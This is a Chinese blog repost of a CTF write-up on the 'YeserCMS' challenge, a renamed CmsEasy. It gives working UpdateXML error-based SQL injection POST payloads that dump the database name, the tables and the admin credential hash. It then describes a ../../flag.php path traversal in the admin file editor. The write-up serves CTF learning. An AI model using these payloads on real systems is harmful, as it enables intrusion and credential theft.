i春秋-百度杯九月场-YeserCMS(cmseasy的UpdateXML注入漏洞)

最新推荐文章于 2023-10-16 23:20:42 发布
最新推荐文章于 2023-10-16 23:20:42 发布
阅读量898 收藏 1
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/RenoStudio/p/10541876.html
版权

学习了大佬们的操作才做出来,记录一次菜鸡的无能为力。

tips:flag在网站根目录下的flag.php中。我们的目标就是flag.php了。

题目说是心的CMS:YeserCMS,然而百度一下,出来该题的wp之外,并没有这个CMS。可能是把原来的CMS改名了,在网站中找看看有没有什么线索,最后发现有cmseasy的标识:

于是百度寻找cmseasy的漏洞,最终确认:http://www.anquan.us/static/bugs/wooyun-2015-0137013.html

https://www.cnblogs.com/yangxiaodi/p/6963624.html

进行报错注入漏洞利用:

构造url:http://57f208a0b1164a51a627a8c5645433ee0a4fbc4fc36a4159.changame.ichunqiu.com//celive/live/header.php

1、试验--暴库

post:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

 

 注入成功:

2、拿表

post:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database() ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

 

 确实是出表了,但是由于长度的限制,没出完,修改payload中1~32的范围,在修改的过程中,发现表开头都是yesercms_,查询结果是按照英文字母排序的,我们要找的user之类的表,于是更改范围,当更改到720~800的时候出现了表yesercms_user

 3、爆管理员账号密码

这里就不爆用户名字段名和密码字段名了,其实在这个站中就是username和password

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx', (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

看到admin已出,但后面的密码没显示完,还用上面修改长度的方法来得到完整的password:ff512d4240cbbdeafada404677ccbe61

 下面就是登陆后台了。

下一个点就是怎么得到flag.php中的内容。

在这里发现可以对服务器文件进行编辑:

 这说明,我们可以对服务器中的文件进行读取,所以可以尝试读取flag.php的内容,抓取点击编辑时的包:

 尝试修改该参数来读取flag.php,../../flag.php时成功拿到flag:

转载于:https://www.cnblogs.com/RenoStudio/p/10541876.html

weixin_30764137
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CmsEasy 漏洞挖掘
hyun134340的博客
01-07 279
在index.php ,定义了一些常量,设置 文件包含的目录,和注册了自定义加载类。lib目录中前两个文件夹分别存放的是后台和前台的控制器。inc文件夹提供一些必要的支撑,数据库的操作,以及控制器的基类,模板渲染类。所有的控制器都继承于 act 类。同时他还给所有数据库的表,设计了相对应的操作,位于table文件夹下,此文件夹下的类也都继承于 table类。tool文件夹存放一些小工具,自定义函数,waf之类的,应用调度,也是在此文件夹处理。继续跟进入口文件。
mysql注入 爆库_mysql报错注入
weixin_29570673的博客
01-19 458
1、报错注入攻击payload语法由于后台没有对数据库的报错信息做过滤,会输入到前台显示,那么我们可以利用制造报错函数(常用的几个函数updatexml(),extractvalue(),floor())进行渗透。报错注入流程:1、判断是否存在注入点2、构造错误的语法制造报错3、使用提示报错信息输出内容。updatexml()函数:xml可扩展标记语言,update()更新函数updatexml(...
【安鸾靶cmseasy&内网渗透 (500分)
信安是不可或缺的一部分!
10-10 1018
等后面靶重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。找了半天在:http://106.15.50.112:8021/config/tag/category_27.php。这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式。frp工具地址:https://github.com/fatedier/frp。
CmsEasy7.6.3.2逻辑漏洞
西电卢本伟的博客
04-22 4790
cmseasy、逻辑漏洞
CmsEasy7.5.4 逻辑漏洞
weixin_53303754的博客
10-16 132
CmsEasy crossall_act.php SQL注入漏洞.md
最新发布
04-08
CmsEasy crossall_act.php SQL注入漏洞.md
CmsEasy_UTF-8.rar_CmsEasy_UTF-8_en_PHP 企业网站_企业网站_网站管理
09-20
CmsEasy_UTF-8.rar】是一个压缩包文件,其中包含了一个名为"CmsEasy"的UTF-8编码的中文企业网站管理系统。这个系统是专为建立企业网站而设计的,其核心特性在于其小巧、高效和人性化的操作界面。根据描述,易通...
CmsEasy 本地测试环境包 V1.0 UTF-8.rar
07-06
CmsEasy_Exp!-1.0 本地环境测试包  为了能使大家更加快捷的使用到我们的CmsEasy 系列产品,  我们将服务器端程序手工进行配置并且直接捆绑我们的CmsEasy 2.0免费版产品。  希望能给大家带来方便。  本产品是...
CmsEasy的开源代码 utf-8格式的
04-07
UTF-8编码是目前互联网上最广泛使用的字符编码标准,能够支持全球多种语言,确保了CmsEasy在处理不同语言内容时的兼容性。 一、CmsEasy系统概述 CmsEasy致力于提供一个简单易用且功能丰富的网站管理平台。它允许...
CmsEasy可视化编辑商城系统-PHP
06-20
CmsEasy可视化编辑商城系统采用拖放技术,具有实时书写和文本编辑功能; 无需代码,自由拖拽布局,适应所有设备。鼠标拖动,即可完成网站设计制作; 图片上传、编辑、排版即可预览设计效果,添加链接,打打字,动感...
CMSeasy v5.5任意权限getshell
08-28
CMSeasy任意权限getshell
cmseasy漏洞复现
qq_52223347的博客
03-10 4387
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞复现 进入管理界面–》模块 --》编辑模
i春秋web题
qq_58091216的博客
03-28 4198
3.21 1.题目名称:常见的搜集 题目内容:一共3部分flag 敏感文件 解题思路:用dirsearch扫描网站 ,发现三个文件robots.txt,index.php~ ,.index.php.swp, dirsearch -u http://eci-2zegi8jh6a7iw18p2ptc.cloudeci1.ichunqiu.com/ 我们依次访问就可以得到flag 2.题目名称:粗心的小李...
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
CTF--CMS漏洞总结
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
"百度"CTF 9月2日 WriteUp.md
Bendawang's Blog
09-04 9647
"百度"CTF 9月2日 WriteUp
[百度]九月 再见CMS writeup
Flyour的博客
04-05 1899
再见CMS 拿到链接是一个博客网站,对于这样的题目: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 这是该网站的登录页面,根据这个登录页面和下方的备案号、版权声明的格式都可以判断出这是个齐博cms。 下面是齐博CMS的整站系统:http://v7.qibosof...
YeserCMS
weixin_30371875的博客
07-24 220
这道题直接让我们查网站根目录的flag,我首先想到的是一句话木马,但是奈何找不到上传的接口啊,只好作罢, 在下载发现有个cmseasy的标识,明显是要提示我们这里是easycms百度easycms漏洞然后注入 注入点: http://cac6d32bf8ff4b52becb3516148c9c106deeaa1e92b64a8e.changame.ichunqiu.com//celive...
22、注入篇————MYSQL数据库updatexml报错注入
Fly_鹏程万里
03-02 6857
MYSQL数据库updatexml报错注入数据库版本信息http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)链接用户http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值